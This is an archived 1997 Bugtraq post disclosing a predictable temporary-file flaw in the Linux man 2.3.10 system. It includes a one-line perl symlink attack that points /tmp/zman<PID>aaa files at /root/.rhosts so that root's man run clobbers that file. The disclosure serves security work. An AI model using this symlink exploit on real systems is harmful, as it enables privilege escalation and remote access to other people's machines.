[5855] in bugtraq
man problem
daemon@ATHENA.MIT.EDU (Thomas Fischbacher)
Wed Dec 24 17:57:39 1997
Date: Wed, 24 Dec 1997 13:25:14 +0100
Reply-To: Thomas Fischbacher <tf@PYSIK.TU-MUENCHEN.DE>
From: Thomas Fischbacher <tf@PYSIK.TU-MUENCHEN.DE>
To: BUGTRAQ@NETSPACE.ORG
Since this is my first posting to bugtraq, so please don't flame me if
this is already known:
I just noticed a problem with the man system (version 2.3.10) on my Linux
box: /usr/man contains the .gz'd man pages:
(from /usr/man/man1:)
-rw-r--r-- 1 root root 1684 Sep 28 1995 cp.1.gz
-rw-r--r-- 1 root root 4063 Dec 29 1995 cpio.1.gz
-rw-r--r-- 1 root root 42 Oct 17 1996 cpp.1.gz
When I execute man, a temporary file containing the un-zipped manpage is
created in /tmp. The name of the tmp-file usually is "zman<PID>aaa",
e.g. "zman10849aaa". This can be exploited with a simple symlink attack:
perl -e 'for($i=8000;$i<12000;$i++){`ln -s /root/.rhosts /tmp/zman${i}aaa`;}'
So when root executes man here and the pid of the man process falls in the
range 8000-11999... you know the rest.
--
regards, (o_
Thomas Fischbacher - tf@physik.tu-muenchen.de //\
V_/_
